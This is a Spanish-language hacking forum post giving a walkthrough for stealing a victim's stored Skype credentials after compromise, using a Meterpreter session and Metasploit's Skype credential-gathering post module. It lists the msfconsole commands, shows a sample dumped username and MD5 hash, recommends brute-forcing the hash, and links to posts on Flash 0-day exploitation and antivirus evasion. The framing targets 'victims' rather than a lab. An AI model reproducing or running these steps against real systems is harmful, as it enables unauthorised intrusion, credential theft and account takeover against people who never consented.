comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Dump skype account our victim for Metasploit

  • 0 Respuestas
  • 2742 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Mayo 21, 2016, 08:10:13 pm »
Dump skype account our victim for Metasploit



Saludos hermanos nuevamente siguiendo con el pequeño maratón de los complementos de Metasploit Framework jajaja, lo que haremos ahora sera Dumpear los datos de las cuentas almacenadas de nuestras victimas.



Como ustedes ya saben, necesitamos una Session Meterpreter para conectarnos con nuestra victima y enviar el Exploit remotamente, dejare los siguientes POST donde enseño como hacerlo.

http://www.backtrack-omar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrack-omar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrack-omar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrack-omar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrack-omar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrack-omar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrack-omar.com/2014/01/aprendiendo-metasploit-avanzado.html

Una ves explotado el sistema de nuestra victima, como vemos en la siguiente imagen:



Añadiremos "Background" para salir de session meterpreter y añadiremos lo siguiente:

Código: [Seleccionar]
msf exploit(handler) > use post/windows/gather/credentials/skype
msf post(skype) > set SESSION 1
SESSION => 1
msf post(skype) > exploit
en la sintaxis set SESSION 1, añadí el numero 1 por el simple hecho que es la primera session de conexión que hemos recibido.

Si ustedes desean ver la lista de las sesiones lo pueden hacer  añadiendo el comando sessions -i , pero antes deben salir de la session meterpreter mediante background.
Una ves hecho  todo lo siguiente, le daremos Exploit.



Como vemos nos Dumpeo la cuenta de Skype registrada de nuestra victima:

El USER de la cuenta la oculte por privacidad, pero la contraseña NO, porque vemos que esta en HASH md5.

Ejemplo:

pepito:018347a360343c4d1b88d8e4dfab756a



Dado lo siguiente, usted puede hacer un ataque de fuerza bruta para obtener la contraseña, Saludos hermanos.

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1653
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 19578
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 2008
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

Iniciado por CalebBucker

Respuestas: 4
Vistas: 4424
Último mensaje Diciembre 23, 2012, 10:08:37 pm
por CalebBucker
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

Respuestas: 2
Vistas: 2753
Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet